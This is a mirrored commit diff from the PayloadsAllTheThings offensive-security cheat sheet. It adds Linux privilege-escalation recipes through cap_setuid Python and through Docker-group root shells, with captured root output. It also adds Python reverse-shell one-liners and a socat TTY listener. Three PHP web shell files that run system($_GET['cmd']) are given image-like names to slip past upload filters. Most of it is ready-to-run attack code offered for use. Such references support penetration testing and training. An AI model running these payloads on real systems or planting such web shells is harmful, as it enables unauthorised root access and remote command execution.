mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Linux capabilities - setuid + read / Docker group privesc
This commit is contained in:
parent
abb81aba7e
commit
a58a8113d1
@ -493,6 +493,10 @@ You need a shell on a user account with a mailbox.
|
||||
python secretsdump.py xxxxxxxxxx -just-dc
|
||||
```
|
||||
|
||||
Alternatively you can use the Metasploit module
|
||||
|
||||
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### PrivEsc Local Admin - Token Impersonation (RottenPotato)
|
||||
|
@ -10,6 +10,15 @@
|
||||
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
|
||||
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
|
||||
|
||||
## Summary
|
||||
|
||||
* [Checklist](#checklist)
|
||||
* [SUID](#suid)
|
||||
* [Capabilities](#capabilities)
|
||||
* [SUDO](#sudo)
|
||||
* [Groups](#groups)
|
||||
* [Docker](#docker)
|
||||
|
||||
## Checklists
|
||||
|
||||
* Kernel and distribution release details
|
||||
@ -111,7 +120,7 @@ sudo chmod +s /tmp/suid # setuid bit
|
||||
```
|
||||
|
||||
|
||||
## Capabilies
|
||||
## Capabilities
|
||||
|
||||
List capabilities of binaries
|
||||
```bash
|
||||
@ -126,12 +135,29 @@ List capabilities of binaries
|
||||
/usr/bin/rcp = cap_net_bind_service+ep
|
||||
```
|
||||
|
||||
Edit capabilites
|
||||
Edit capabilities
|
||||
```powershell
|
||||
/sbin/setcap -r /bin/ping # remove
|
||||
setcap cap_net_raw+p /bin/ping # add
|
||||
```
|
||||
|
||||
Interesting capabilities
|
||||
|
||||
```powershell
|
||||
cap_dac_read_search # read anything
|
||||
cap_setuid+ep # setuid
|
||||
```
|
||||
|
||||
Example of privilege escalation with `cap_setuid+ep`
|
||||
|
||||
```powershell
|
||||
$ sudo setcap cap_setuid+ep /usr/bin/python2.7
|
||||
|
||||
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||
sh-5.0# id
|
||||
uid=0(root) gid=1000(swissky)
|
||||
```
|
||||
|
||||
## SUDO
|
||||
|
||||
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
|
||||
@ -178,7 +204,30 @@ $> docker run -it --rm -v $PWD:/mnt bash
|
||||
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
|
||||
```
|
||||
|
||||
Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
|
||||
|
||||
```powershell
|
||||
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
|
||||
latest: Pulling from chrisfosterelli/rootplease
|
||||
2de59b831a23: Pull complete
|
||||
354c3661655e: Pull complete
|
||||
91930878a2d7: Pull complete
|
||||
a3ed95caeb02: Pull complete
|
||||
489b110c54dc: Pull complete
|
||||
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
|
||||
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
|
||||
|
||||
You should now have a root shell on the host OS
|
||||
Press Ctrl-D to exit the docker instance / shell
|
||||
|
||||
sh-5.0# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
|
||||
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
|
||||
- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
|
||||
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
|
@ -36,6 +36,11 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
|
||||
|
||||
Linux only
|
||||
|
||||
IPv4
|
||||
```python
|
||||
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||||
```
|
||||
|
||||
IPv4
|
||||
```python
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
|
||||
@ -186,20 +191,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
|
||||
|
||||
## Spawn TTY
|
||||
|
||||
```bash
|
||||
/bin/sh -i
|
||||
```
|
||||
|
||||
(From an interpreter)
|
||||
|
||||
```powershell
|
||||
python -c 'import pty; pty.spawn("/bin/sh")'
|
||||
perl -e 'exec "/bin/sh";'
|
||||
perl: exec "/bin/sh";
|
||||
ruby: exec "/bin/sh"
|
||||
lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||
|
||||
@ -216,19 +207,24 @@ export TERM=xterm-256color
|
||||
stty rows <num> columns <cols>
|
||||
```
|
||||
|
||||
(From within vi)
|
||||
or use `socat` binary to get a fully tty reverse shell
|
||||
|
||||
```bash
|
||||
:!bash
|
||||
:set shell=/bin/bash:shell
|
||||
socat file:`tty`,raw,echo=0 tcp-listen:12345
|
||||
```
|
||||
|
||||
(From within nmap)
|
||||
Spawn a TTY shell from an interpreter
|
||||
|
||||
```sh
|
||||
!sh
|
||||
```powershell
|
||||
/bin/sh -i
|
||||
python -c 'import pty; pty.spawn("/bin/sh")'
|
||||
perl -e 'exec "/bin/sh";'
|
||||
perl: exec "/bin/sh";
|
||||
ruby: exec "/bin/sh"
|
||||
lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||
|
1
Upload insecure files/Extension PHP/shell.gif?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.gif?shell.php
Normal file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload insecure files/Extension PHP/shell.jpg?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.jpg?shell.php
Normal file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload insecure files/Extension PHP/shell.png?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.png?shell.php
Normal file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
Loading…
Reference in New Issue
Block a user